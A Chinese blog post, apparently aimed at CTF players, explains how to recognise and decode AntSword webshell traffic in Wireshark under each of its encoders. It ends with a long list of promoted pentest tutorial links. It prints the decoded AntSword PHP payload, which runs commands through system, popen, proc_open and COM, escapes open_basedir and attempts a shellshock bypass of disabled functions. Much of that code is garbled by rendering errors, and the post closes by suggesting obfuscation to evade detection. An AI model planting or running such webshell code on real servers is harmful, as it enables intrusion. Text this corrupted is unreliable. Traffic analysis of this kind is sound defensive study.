1、前言
最近打CTF比赛,遇到了流量分析的题目,通过流量分析还原黑客攻击的过程、执行了哪些操作、偷走了哪些数据。这个过程中就涉及到了webshell工具,有冰蝎、哥斯拉、蚁剑。这次就先谈谈蚁剑的流量分析,下次再分享其他工具的流量分析。
2、蚁剑流量分析
2.1 蚁剑编码与解码
AntSword 是一款开源、跨平台的网站管理工具,旨在满足渗透测试人员、具有权限和授权的安全研究人员以及网站管理员的需求。测试文件上传漏洞时,经常用到该工具。
蚁剑与网站进行数据交互的过程中,发送的数据是经过编码器编码后再发送,支持的编码方式有default默认的、base64、chr、chr16、rot13;网站返回的数据经过解码器中的编码方式编码后返回,支持的编码方式有default、base64、rot13。
2.2 default编码和解码
wireshark过滤http协议数据包,也可以再过滤post请求,因为蚁剑是post方式请求。然后对http数据流进行追踪,可以找到数据交互的过程。
追踪http数据流可以看到请求的内容,默认编码方式使用了base64,而返回的数据可以直接看到。
对请求的数据进行URL解码并进行PHP代码格式化,可以得到清晰可读的代码。从代码可知,蚁剑带了明显的特征函数@ini_set();123就是连接webshell的密码;以post的方式传入了三个参数,并取参数值的第三个字符开始的字符串进行base64解码。
123=@ini_set(“display_errors”, “0”);
@set_time_limit(0);
o
p
d
i
r
@
ˉ
i
n
i
_
g
e
t
(
"
o
p
e
n
_
b
a
s
e
d
i
r
"
)
;
i
f
(
opdir\=@ini\_get("open\_basedir"); if(
opdir@ˉini_get("open_basedir");if(opdir) {
o
c
w
d
d
ˉ
i
r
n
a
m
e
(
ocwd\=dirname(
ocwddˉirname(_SERVER[“SCRIPT_FILENAME”]);
o
p
a
r
r
p
ˉ
r
e
g
_
s
p
l
i
t
(
b
a
s
e
64
_
d
e
c
o
d
e
(
"
L
z
t
8
O
i
8
=
"
)
,
oparr\=preg\_split(base64\_decode("Lzt8Oi8="),
oparrpˉreg_split(base64_decode("Lzt8Oi8="),opdir); @array_push(
o
p
a
r
r
,
oparr,
oparr,ocwd,sys_get_temp_dir()); foreach($oparr as KaTeX parse error: Expected '}', got 'EOF' at end of input: …!@is\_writable(item)) { continue; } ; KaTeX parse error: Expected group as argument to '\=' at end of input: tmdir\=item.“/.4a400f19”; @mkdir(
t
m
d
i
r
)
;
i
f
(
!
@
f
i
l
e
_
e
x
i
s
t
s
(
tmdir); if(!@file\_exists(
tmdir);if(!@file_exists(tmdir)) { continue; }
t
m
d
i
r
r
ˉ
e
a
l
p
a
t
h
(
tmdir\=realpath(
tmdirrˉealpath(tmdir); @chdir($tmdir); @ini_set(“open_basedir”, “…”);
c
n
t
a
r
r
@
ˉ
p
r
e
g
_
s
p
l
i
t
(
"
/
∣
/
/
"
,
cntarr\=@preg\_split("/\\\\\\\\|\\//",
cntarr@ˉpreg_split("/∣//",tmdir); for (
i
0
ˉ
;
i\=0;
i0ˉ;i<sizeof(
c
n
t
a
r
r
)
;
cntarr);
cntarr);i++) { @chdir(“…”); } ; @ini_set(“open_basedir”,“/”); @rmdir(KaTeX parse error: Expected 'EOF', got '}' at position 17: …mdir); break; }̲ ; } ; ; …out) { return $out;
}
;
function asoutput() {
o
u
t
p
u
t
o
ˉ
b
_
g
e
t
_
c
o
n
t
e
n
t
s
(
)
;
o
b
_
e
n
d
_
c
l
e
a
n
(
)
;
e
c
h
o
"
9863
"
.
"
22
f
e
9
"
;
e
c
h
o
@
a
s
e
n
c
(
output\=ob\_get\_contents(); ob\_end\_clean(); echo "9863"."22fe9"; echo @asenc(
outputoˉb_get_contents();ob_end_clean();echo"9863"."22fe9";echo@asenc(output); echo “bfb”.“3ba6”;
}
ob_start();
try {
p
b
ˉ
a
s
e
64
_
d
e
c
o
d
e
(
s
u
b
s
t
r
(
p\=base64\_decode(substr(
pbˉase64_decode(substr(_POST[“mb15ce4fadb25d”],2));
s
b
ˉ
a
s
e
64
_
d
e
c
o
d
e
(
s
u
b
s
t
r
(
s\=base64\_decode(substr(
sbˉase64_decode(substr(_POST[“s7c079558ec28f”],2));
e
n
v
s
t
r
@
ˉ
b
a
s
e
64
_
d
e
c
o
d
e
(
s
u
b
s
t
r
(
envstr\=@base64\_decode(substr(
envstr@ˉbase64_decode(substr(_POST[“ye516631e211db”],2));
d
d
ˉ
i
r
n
a
m
e
(
d\=dirname(
ddˉirname(_SERVER[“SCRIPT_FILENAME”]);
c
s
ˉ
u
b
s
t
r
(
c\=substr(
csˉubstr(d,0,1)==“/”?“-c \”{KaTeX parse error: Expected 'EOF', got '}' at position 2: s}̲\\"":"/c \\"{s}\“”; if(substr(
d
,
0
,
1
)
=
ˉ
"
/
"
)
@
p
u
t
e
n
v
(
"
P
A
T
H
=
"
.
g
e
t
e
n
v
(
"
P
A
T
H
"
)
.
"
:
/
u
s
r
/
l
o
c
a
l
/
s
b
i
n
:
/
u
s
r
/
l
o
c
a
l
/
b
i
n
:
/
u
s
r
/
s
b
i
n
:
/
u
s
r
/
b
i
n
:
/
s
b
i
n
:
/
b
i
n
"
)
;
e
l
s
e
@
p
u
t
e
n
v
(
"
P
A
T
H
=
"
.
g
e
t
e
n
v
(
"
P
A
T
H
"
)
.
"
;
C
:
/
W
i
n
d
o
w
s
/
s
y
s
t
e
m
32
;
C
:
/
W
i
n
d
o
w
s
/
S
y
s
W
O
W
64
;
C
:
/
W
i
n
d
o
w
s
;
C
:
/
W
i
n
d
o
w
s
/
S
y
s
t
e
m
32
/
W
i
n
d
o
w
s
P
o
w
e
r
S
h
e
l
l
/
v
1.0
/
;
"
)
;
i
f
(
!
e
m
p
t
y
(
d,0,1)\=="/") { @putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"); } else { @putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;"); } if(!empty(
d,0,1)=ˉ"/")@putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");else@putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");if(!empty(envstr)) { $envarr=explode(“|||asline|||”,
e
n
v
s
t
r
)
;
f
o
r
e
a
c
h
(
envstr); foreach(
envstr);foreach(envarr as KaTeX parse error: Expected '}', got 'EOF' at end of input: …{ if (!empty(v)) { @putenv(str_replace(“|||askey|||”, “=”, $v)); } } } KaTeX parse error: Expected '}', got 'EOF' at end of input: r\="{p} {KaTeX parse error: Expected 'EOF', got '}' at position 2: c}̲"; function fe(f) {
d
e
ˉ
x
p
l
o
d
e
(
"
,
"
,
@
i
n
i
_
g
e
t
(
"
d
i
s
a
b
l
e
_
f
u
n
c
t
i
o
n
s
"
)
)
;
i
f
(
e
m
p
t
y
(
d\=explode(",",@ini\_get("disable\_functions")); if(empty(
deˉxplode(",",@ini_get("disable_functions"));if(empty(d)) { $d=array(); } else {
d
a
ˉ
r
r
a
y
_
m
a
p
(
′
t
r
i
m
′
,
a
r
r
a
y
_
m
a
p
(
′
s
t
r
t
o
l
o
w
e
r
′
,
d\=array\_map('trim',array\_map('strtolower',
daˉrray_map(′trim′,array_map(′strtolower′,d)); } return(function_exists(KaTeX parse error: Expected 'EOF', got '&' at position 3: f)&̲&is\_callable(f)&&!in_array(
f
,
f,
f,d)); } ; function runshellshock($d, KaTeX parse error: Expected '}', got 'EOF' at end of input: … { if (substr(d, 0, 1) == “/” && fe(‘putenv’) && (fe(‘error_log’) || fe(‘mail’))) { if (strstr(readlink(“/bin/sh”), “bash”) != FALSE) { $tmp = tempnam(sys_get_temp_dir(), ‘as’); putenv(“PHP_LOL=() { x; };
c
>
c >
c>tmp 2>&1”); if (fe(‘error_log’)) { error_log(“a”, 1); } else { mail(“a@127.0.0.1”, “”, “”, “-bv”); } } else { return False; } KaTeX parse error: Expected group as argument to '\=' at position 10: output \= ̲@file\_get\_con…tmp); @unlink(
t
m
p
)
;
i
f
(
tmp); if (
tmp);if(output != “”) { print(KaTeX parse error: Expected 'EOF', got '}' at position 28: …return True; }̲ } return Fal…c) { $ret=0;
d
d
ˉ
i
r
n
a
m
e
(
d\=dirname(
ddˉirname(_SERVER[“SCRIPT_FILENAME”]); if(fe(‘system’)) { @system(
c
,
c,
c,ret); } elseif(fe(‘passthru’)) { @passthru(
c
,
c,
c,ret); } elseif(fe(‘shell_exec’)) { print(@shell_exec(KaTeX parse error: Expected 'EOF', got '}' at position 7: c)); }̲ elseif(fe('exe…c,
o
,
o,
o,ret); print(join("
“,$o)); } elseif(fe(‘popen’)) {
f
p
@
ˉ
p
o
p
e
n
(
fp\=@popen(
fp@ˉpopen(c,‘r’); while(!@feof(KaTeX parse error: Expected '}', got 'EOF' at end of input: … print(@fgets(fp,2048)); } @pclose($fp); } elseif(fe(‘proc_open’)) { KaTeX parse error: Expected group as argument to '\=' at position 5: p \= ̲@proc\_open(c, array(1 => array(‘pipe’, ‘w’), 2 => array(‘pipe’, ‘w’)),
i
o
)
;
w
h
i
l
e
(
!
@
f
e
o
f
(
io); while(!@feof(
io);while(!@feof(io[1])) { print(@fgets(KaTeX parse error: Undefined control sequence: \[ at position 3: io\̲[̲1\],2048)); }…io[2])) { print(@fgets(KaTeX parse error: Undefined control sequence: \[ at position 3: io\̲[̲2\],2048)); }…io[1]); @fclose(KaTeX parse error: Undefined control sequence: \[ at position 3: io\̲[̲2\]); @proc\_…p); } elseif(fe(‘antsystem’)) { @antsystem(KaTeX parse error: Expected 'EOF', got '}' at position 6: c); }̲ elseif(runshel…d, $c)) { return KaTeX parse error: Expected 'EOF', got '}' at position 7: ret; }̲ elseif(substr(d,0,1)!=”/" && @class_exists(“COM”)) { $w=new COM(‘WScript.shell’); KaTeX parse error: Expected group as argument to '\=' at end of input: e\=w->exec($c); KaTeX parse error: Expected group as argument to '\=' at end of input: so\=e->StdOut(); KaTeX parse error: Expected group as argument to '\=' at end of input: ret.\=so->ReadAll(); KaTeX parse error: Expected group as argument to '\=' at end of input: se\=e->StdErr(); KaTeX parse error: Expected group as argument to '\=' at end of input: ret.\=se->ReadAll(); print($ret); } else { $ret = 127; } return $ret; } ;
r
e
t
@
ˉ
r
u
n
c
m
d
(
ret\=@runcmd(
ret@ˉruncmd(r." 2>&1"); print (KaTeX parse error: Expected '}', got 'EOF' at end of input: ret!=0)?"ret={ret}“:”"; ;
}
catch(Exception KaTeX parse error: Expected '}', got 'EOF' at end of input: …cho "ERROR://".e->getMessage();
}
;
asoutput();
die();
&mb15ce4fadb25d=qML2Jpbi9zaA==&s7c079558ec28f=wjY2QgIi92YXIvd3d3L2h0bWwvdXBsb2FkIjtwd2Q7ZWNobyBlMjI1MDUwOThjYWU7cHdkO2VjaG8gYmVjMWU=&ye516631e211db=JO
对参数值(删除前2个字符)进行base64解码,可以知道在/var/www/html/upload目录下执行了pwd命令。
解码前:
L2Jpbi9zaA==
解码后:
/bin/sh
解码前:
Y2QgIi92YXIvd3d3L2h0bWwvdXBsb2FkIjtwd2Q7ZWNobyBlMjI1MDUwOThjYWU7cHdkO2VjaG8gYmVjMWU=
解码后:
cd “/var/www/html/upload”;pwd;echo e22505098cae;pwd;echo bec1e
2.3 base64编码和解码
蚁剑会随机生成一个参数传入 base64 编码后的代码,密码参数的值是通过 POST 获取随机参数的值然后进行 base64 解码后使用 eval 执行。我们把参数值进行base64解码就可以得到执行的代码。
除了上述的参数外,这里还有2个参数,从上述解码出来的代码可知,对参数值(删除前2个字符)进行base64解码就可以得到具体的信息。
解码前:
L2Jpbi9zaA==
解码后:
/bin/sh
解码前:
Y2QgIi92YXIvd3d3L2h0bWwvdXBsb2FkIjtwd2Q7ZWNobyBlMjI1MDUwOThjYWU7cHdkO2VjaG8gYmVjMWU=
解码后:
cd “/var/www/html/upload”;pwd;echo e22505098cae;pwd;echo bec1e
响应包中返回的数据使用base64编码。蚁剑的返回的数据采用base64编码时有点不一样,即返回的数据格式为:随机数 编码后数据 随机数。
想要解码一种方式是用脚本去爆破。由于是base64编码,数据最后有一个=,所以可以确定=后面的是插入的随机数,然后把前面的字符串放到base64在线解码器,逐个地删除开头的字符进行解码测试,就可以得到解码后的数据。可以知道是上面执行pwd命令返回的结果。
解码前:
72e6951ce83cL3Zhci93d3cvaHRtbC91cGxvYWQKMzc1YmZjYzEyNzhkCi92YXIvd3d3L2h0bWwvdXBsb2FkCjhkY2I4NAo=
解码后:
ïgº÷{ÍÜ/var/www/html/upload
375bfcc1278d
/var/www/html/upload
8dcb84
2.4 chr编码
chr编码就是把字符转换成了CHR(ASCII码),简单地说就是chr()函数可以把ASCII码转换成字符。使用chr编码的时候,使用了 @eval()函数,对函数内的每一个字符进行了chr编码,写个脚本解码就可以得到字符串内容。
chr解码后可知,请求的内容最后传入了三个参数进行了base64编码,base64解码后就可以得到参数值。
2.5 chr16编码
chr16编码与chr编码差不多,不同的地方在于chr编码中的ASCII值是十进制,chr16编码中的ASCII值是十六进制。
2.6 rot13编码和解码
POST请求中rot13编码方式,也是使用了@eval()函数,然后对post传的传输进行了rot13编码。
对请求体进行URL解码和代码格式化后,rot13编码的参数是一个函数。
123=@eval(@str_rot13($_POST[‘pa6d3f66e30843’]));
&pa6d3f66e30843=@vav_frg(“qvfcynl_reebef”, “0”);
传入的参数依旧还是base64编码,对参数值解码可以知道执行了pwd命令。
响应数据使用了rot13编码,无法直接看出返回的数据是什么,解码后才能看到返回的具体数据。
通过rot13在线解码,可以得到返回的数据是Linux目录的路径。
80r7n7196/var/www/html/upload
fd752b168
/var/www/html/upload
3ea4dc9aaea
4259102r
3、最后
使用编码器和解码器对流量进行编码加密,在一定程度可以绕过waf或者流量分析检测。但是在蚁剑中PHP类型的webshell还是带了比较明显的流量特征,如@ini_set(“display_errors”, “0”)、@set_time_limit (0)、@eval(),所以想要更好地绕过流量分析检测还得增加一些手段,比如加入混淆代码、改造编解码器等。
黑客/网络安全学习路线
对于从来没有接触过黑客/网络安全的同学,目前网络安全、信息安全也是计算机大学生毕业薪资相对较高的学科。
大白也帮大家准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
这也是耗费了大白近四个月的时间,吐血整理,文章非常非常长,觉得有用的话,希望粉丝朋友帮忙点个**「分享」「收藏」「在看」「赞」**
网络安全/渗透测试法律法规必知必会****
今天大白就帮想学黑客/网络安全技术的朋友们入门必须先了解法律法律。
【网络安全零基础入门必知必会】什么是黑客、白客、红客、极客、脚本小子?(02)
【网络安全零基础入门必知必会】网络安全专业术语全面解析(05)
【网络安全入门必知必会】《中华人民共和国网络安全法》(06)
【网络安全零基础入门必知必会】《计算机信息系统安全保护条例》(07)
【网络安全零基础入门必知必会】《中国计算机信息网络国际联网管理暂行规定》(08)
【网络安全零基础入门必知必会】《计算机信息网络国际互联网安全保护管理办法》(09)
【网络安全零基础入门必知必会】《互联网信息服务管理办法》(10)
【网络安全零基础入门必知必会】《计算机信息系统安全专用产品检测和销售许可证管理办法》(11)
【网络安全零基础入门必知必会】《通信网络安全防护管理办法》(12)
【网络安全零基础入门必知必会】《中华人民共和国国家安全法》(13)
【网络安全零基础入门必知必会】《中华人民共和国数据安全法》(14)
【网络安全零基础入门必知必会】《中华人民共和国个人信息保护法》(15)
【网络安全零基础入门必知必会】《网络产品安全漏洞管理规定》(16)
网络安全/渗透测试linux入门必知必会
【网络安全零基础入门必知必会】什么是Linux?Linux系统的组成与版本?什么是命令(01)
【网络安全零基础入门必知必会】VMware下载安装,使用VMware新建虚拟机,远程管理工具(02)
【网络安全零基础入门必知必会】VMware常用操作指南(非常详细)零基础入门到精通,收藏这一篇就够了(03)
【网络安全零基础入门必知必会】CentOS7安装流程步骤教程(非常详细)零基入门到精通,收藏这一篇就够了(04)
【网络安全零基础入门必知必会】Linux系统目录结构详细介绍(05)
【网络安全零基础入门必知必会】Linux 命令大全(非常详细)零基础入门到精通,收藏这一篇就够了(06)
【网络安全零基础入门必知必会】linux安全加固(非常详细)零基础入门到精通,收藏这一篇就够了(07)
网络安全/渗透测试****计算机网络入门必知必会****
【网络安全零基础入门必知必会】TCP/IP协议深入解析(非常详细)零基础入门到精通,收藏这一篇就够了(01)
【网络安全零基础入门必知必会】什么是HTTP数据包&Http数据包分析(非常详细)零基础入门到精通,收藏这一篇就够了(02)
【网络安全零基础入门必知必会】计算机网络—子网划分、子网掩码和网关(非常详细)零基础入门到精通,收藏这一篇就够了(03)
网络安全/渗透测试入门之HTML入门必知必会
【网络安全零基础入门必知必会】什么是HTML&HTML基本结构&HTML基本使用(非常详细)零基础入门到精通,收藏这一篇就够了1
【网络安全零基础入门必知必会】VScode、PhpStorm的安装使用、Php的环境配置,零基础入门到精通,收藏这一篇就够了2
【网络安全零基础入门必知必会】HTML之编写登录和文件上传(非常详细)零基础入门到精通,收藏这一篇就够了3
网络安全/渗透测试入门之Javascript入门必知必会
【网络安全零基础入门必知必会】Javascript语法基础(非常详细)零基础入门到精通,收藏这一篇就够了(01)
【网络安全零基础入门必知必会】Javascript实现Post请求、Ajax请求、输出数据到页面、实现前进后退、文件上传(02)
网络安全/渗透测试入门之Shell入门必知必会
【网络安全零基础入门必知必会】Shell编程基础入门(非常详细)零基础入门到精通,收藏这一篇就够了(第七章)
网络安全/渗透测试入门之PHP入门必知必会
【网络安全零基础入门】PHP环境搭建、安装Apache、安装与配置MySQL(非常详细)零基础入门到精通,收藏这一篇就够(01)
【网络安全零基础入门】PHP基础语法(非常详细)零基础入门到精通,收藏这一篇就够了(02)
【网络安全零基础入门必知必会】PHP+Bootstrap实现表单校验功能、PHP+MYSQL实现简单的用户注册登录功能(03)
网络安全/渗透测试入门之MySQL入门必知必会
【网络安全零基础入门必知必会】MySQL数据库基础知识/安装(非常详细)零基础入门到精通,收藏这一篇就够了(01)
【网络安全零基础入门必知必会】SQL语言入门(非常详细)零基础入门到精通,收藏这一篇就够了(02)
【网络安全零基础入门必知必会】MySQL函数使用大全(非常详细)零基础入门到精通,收藏这一篇就够了(03)
【网络安全零基础入门必知必会】MySQL多表查询语法(非常详细)零基础入门到精通,收藏这一篇就够了(04)
****网络安全/渗透测试入门之Python入门必知必会
【网络安全零基础入门必知必会】之Python+Pycharm安装保姆级教程,Python环境配置使用指南,收藏这一篇就够了【1】
【网络安全零基础入门必知必会】之Python编程入门教程(非常详细)零基础入门到精通,收藏这一篇就够了(2)
python入门教程python开发基本流程控制if … else
python入门教程之python开发可变和不可变数据类型和hash
【网络安全零基础入门必知必会】之10个python爬虫入门实例(非常详细)零基础入门到精通,收藏这一篇就够了(3)
****网络安全/渗透测试入门之SQL注入入门必知必会
【网络安全渗透测试零基础入门必知必会】之初识SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了(1)
【网络安全渗透测试零基础入门必知必会】之SQL手工注入基础语法&工具介绍(2)
【网络安全渗透测试零基础入门必知必会】之SQL注入实战(非常详细)零基础入门到精通,收藏这一篇就够了(3)
【网络安全渗透测试零基础入门必知必会】之SQLmap安装&实战(非常详细)零基础入门到精通,收藏这一篇就够了(4)
【网络安全渗透测试零基础入门必知必会】之SQL防御(非常详细)零基础入门到精通,收藏这一篇就够了(4)
****网络安全/渗透测试入门之XSS攻击入门必知必会
【网络安全渗透测试零基础入门必知必会】之XSS攻击基本概念和原理介绍(非常详细)零基础入门到精通,收藏这一篇就够了(1)
网络安全渗透测试零基础入门必知必会】之XSS攻击获取用户cookie和用户密码(实战演示)零基础入门到精通收藏这一篇就够了(2)
【网络安全渗透测试零基础入门必知必会】之XSS攻击获取键盘记录(实战演示)零基础入门到精通收藏这一篇就够了(3)
【网络安全渗透测试零基础入门必知必会】之xss-platform平台的入门搭建(非常详细)零基础入门到精通,收藏这一篇就够了4
【网络安全渗透测试入门】之XSS漏洞检测、利用和防御机制XSS游戏(非常详细)零基础入门到精通,收藏这一篇就够了5
****网络安全/渗透测试入门文件上传攻击与防御入门必知必会
【网络安全渗透测试零基础入门必知必会】之什么是文件包含漏洞&分类(非常详细)零基础入门到精通,收藏这一篇就够了1
【网络安全渗透测试零基础入门必知必会】之cve实际漏洞案例解析(非常详细)零基础入门到精通, 收藏这一篇就够了2
【网络安全渗透测试零基础入门必知必会】之PHP伪协议精讲(文件包含漏洞)零基础入门到精通,收藏这一篇就够了3
【网络安全渗透测试零基础入门必知必会】之如何搭建 DVWA 靶场保姆级教程(非常详细)零基础入门到精通,收藏这一篇就够了4
【网络安全渗透测试零基础入门必知必会】之Web漏洞-文件包含漏洞超详细全解(附实例)5
【网络安全渗透测试零基础入门必知必会】之文件上传漏洞修复方案6
****网络安全/渗透测试入门CSRF渗透与防御必知必会
【网络安全渗透测试零基础入门必知必会】之CSRF漏洞概述和原理(非常详细)零基础入门到精通, 收藏这一篇就够了1
【网络安全渗透测试零基础入门必知必会】之CSRF攻击的危害&分类(非常详细)零基础入门到精通, 收藏这一篇就够了2
【网络安全渗透测试零基础入门必知必会】之XSS与CSRF的区别(非常详细)零基础入门到精通, 收藏这一篇就够了3
【网络安全渗透测试零基础入门必知必会】之CSRF漏洞挖掘与自动化工具(非常详细)零基础入门到精通,收藏这一篇就够了4
【网络安全渗透测试零基础入门必知必会】之CSRF请求伪造&Referer同源&置空&配合XSS&Token值校验&复用删除5
****网络安全/渗透测试入门SSRF渗透与防御必知必会
【网络安全渗透测试零基础入门必知必会】之SSRF漏洞概述及原理(非常详细)零基础入门到精通,收藏这一篇就够了 1
【网络安全渗透测试零基础入门必知必会】之SSRF相关函数和协议(非常详细)零基础入门到精通,收藏这一篇就够了2
【网络安全渗透测试零基础入门必知必会】之SSRF漏洞原理攻击与防御(非常详细)零基础入门到精通,收藏这一篇就够了3**
**
****网络安全/渗透测试入门XXE渗透与防御必知必会
【网络安全渗透测试零基础入门必知必会】之XML外部实体注入(非常详细)零基础入门到精通,收藏这一篇就够了1
网络安全渗透测试零基础入门必知必会】之XXE的攻击与危害(非常详细)零基础入门到精通,收藏这一篇就够了2
【网络安全渗透测试零基础入门必知必会】之XXE漏洞漏洞及利用方法解析(非常详细)零基础入门到精通,收藏这一篇就够了3
【网络安全渗透测试零基础入门必知必会】之微信XXE安全漏洞处理(非常详细)零基础入门到精通,收藏这一篇就够了4
****网络安全/渗透测试入门远程代码执行渗透与防御必知必会
【网络安全渗透测试零基础入门必知必会】之远程代码执行原理介绍(非常详细)零基础入门到精通,收藏这一篇就够了1
【网络安全零基础入门必知必会】之CVE-2021-4034漏洞原理解析(非常详细)零基础入门到精通,收藏这一篇就够了2
【网络安全零基础入门必知必会】之PHP远程命令执行与代码执行原理利用与常见绕过总结3
【网络安全零基础入门必知必会】之WEB安全渗透测试-pikachu&DVWA靶场搭建教程,零基础入门到精通,收藏这一篇就够了4
****网络安全/渗透测试入门反序列化渗透与防御必知必会
【网络安全零基础入门必知必会】之什么是PHP对象反序列化操作(非常详细)零基础入门到精通,收藏这一篇就够了1
【网络安全零基础渗透测试入门必知必会】之php反序列化漏洞原理解析、如何防御此漏洞?如何利用此漏洞?2
【网络安全渗透测试零基础入门必知必会】之Java 反序列化漏洞(非常详细)零基础入门到精通,收藏这一篇就够了3
【网络安全渗透测试零基础入门必知必会】之Java反序列化漏洞及实例解析(非常详细)零基础入门到精通,收藏这一篇就够了4
【网络安全渗透测试零基础入门必知必会】之CTF题目解析Java代码审计中的反序列化漏洞,以及其他漏洞的组合利用5
网络安全/渗透测试**入门逻辑漏洞必知必会**
【网络安全渗透测试零基础入门必知必会】之一文带你0基础挖到逻辑漏洞(非常详细)零基础入门到精通,收藏这一篇就够了
网络安全/渗透测试入门暴力猜解与防御必知必会
【网络安全渗透测试零基础入门必知必会】之密码安全概述(非常详细)零基础入门到精通,收藏这一篇就够了1
【网络安全渗透测试零基础入门必知必会】之什么样的密码是不安全的?(非常详细)零基础入门到精通,收藏这一篇就够了2
【网络安全渗透测试零基础入门必知必会】之密码猜解思路(非常详细)零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之利用Python暴力破解邻居家WiFi密码、压缩包密码,收藏这一篇就够了4
【网络安全渗透测试零基础入门必知必会】之BurpSuite密码爆破实例演示,零基础入门到精通,收藏这一篇就够了5
【网络安全渗透测试零基础入门必知必会】之Hydra密码爆破工具使用教程图文教程,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之暴力破解medusa,零基础入门到精通,收藏这一篇就够了7
【网络安全渗透测试零基础入门必知必会】之Metasploit抓取密码,零基础入门到精通,收藏这一篇就够了8
****网络安全/渗透测试入门掌握Redis未授权访问漏洞必知必会
【网络安全渗透测试零基础入门必知必会】之Redis未授权访问漏洞,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之Redis服务器被攻击后该如何安全加固,零基础入门到精通,收藏这一篇就够了**
**
网络安全/渗透测试入门掌握**ARP渗透与防御关必知必会**
【网络安全渗透测试零基础入门必知必会】之ARP攻击原理解析,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之ARP流量分析,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之ARP防御策略与实践指南,零基础入门到精通,收藏这一篇就够了
网络安全/渗透测试入门掌握系统权限提升渗透与防御关****必知必会
【网络安全渗透测试零基础入门必知必会】之Windows提权常用命令,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之Windows权限提升实战,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之linux 提权(非常详细)零基础入门到精通,收藏这一篇就够了
网络安全/渗透测试入门掌握Dos与DDos渗透与防御相关****必知必会
【网络安全渗透测试零基础入门必知必会】之DoS与DDoS攻击原理(非常详细)零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之Syn-Flood攻击原理解析(非常详细)零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之IP源地址欺骗与dos攻击,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之SNMP放大攻击原理及实战演示,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之NTP放大攻击原理,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之什么是CC攻击?CC攻击怎么防御?,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之如何防御DDOS的攻击?零基础入门到精通,收藏这一篇就够了
网络安全/渗透测试入门掌握无线网络安全渗透与防御相关****必知必会
【网络安全渗透测试零基础入门必知必会】之Aircrack-ng详细使用安装教程,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之aircrack-ng破解wifi密码(非常详细)零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之WEB渗透近源攻击,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之无线渗透|Wi-Fi渗透思路,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之渗透WEP新思路Hirte原理解析,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之WPS的漏洞原理解析,零基础入门到精通,收藏这一篇就够了
网络安全/渗透测试入门掌握木马免杀问题与防御********必知必会
【网络安全渗透测试零基础入门必知必会】之Metasploit – 木马生成原理和方法,零基础入门到精通,收藏这篇就够了
【网络安全渗透测试零基础入门必知必会】之MSF使用教程永恒之蓝漏洞扫描与利用,收藏这一篇就够了
网络安全/渗透测试入门掌握Vulnhub靶场实战********必知必会
【网络安全渗透测试零基础入门必知必会】之Vulnhub靶机Prime使用指南,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之Vulnhub靶场Breach1.0解析,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之vulnhub靶场之DC-9,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之Vulnhub靶机Kioptrix level-4 多种姿势渗透详解,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之Vulnhub靶场PWNOS: 2.0 多种渗透方法,收藏这一篇就够了
网络安全/渗透测试入门掌握社会工程学必知必会
【网络安全渗透测试零基础入门必知必会】之什么是社会工程学?定义、类型、攻击技术,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之社会工程学之香农-韦弗模式,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之社工学smcr通信模型,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之社会工程学之社工步骤整理(附相应工具下载)收藏这一篇就够了
网络安全/渗透测试入门掌握********渗透测试工具使用******必知必会**
2024版最新Kali Linux操作系统安装使用教程(非常详细)零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之渗透测试工具大全之Nmap安装使用命令指南,零基础入门到精通,收藏这一篇就够了
2024版最新AWVS安装使用教程(非常详细)零基础入门到精通,收藏这一篇就够了
2024版最新burpsuite安装使用教程(非常详细)零基础入门到精通,收藏这一篇就够了
2024版最新owasp_zap安装使用教程(非常详细)零基础入门到精通,收藏这一篇就够了
2024版最新Sqlmap安装使用教程(非常详细)零基础入门到精通,收藏这一篇就够了
2024版最新Metasploit安装使用教程(非常详细)零基础入门到精通,收藏这一篇就够了
2024版最新Nessus下载安装激活使用教程(非常详细)零基础入门到精通,收藏这一篇就够了
2024版最新Wireshark安装使用教程(非常详细)零基础入门到精通,收藏这一篇就够了
觉得有用的话,希望粉丝朋友帮大白点个**「分享」「收藏」「在看」「赞」**
黑客/网络安全学习包
资料目录
-
成长路线图&学习规划
-
配套视频教程
-
SRC&黑客文籍
-
护网行动资料
-
黑客必读书单
-
面试题合集
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
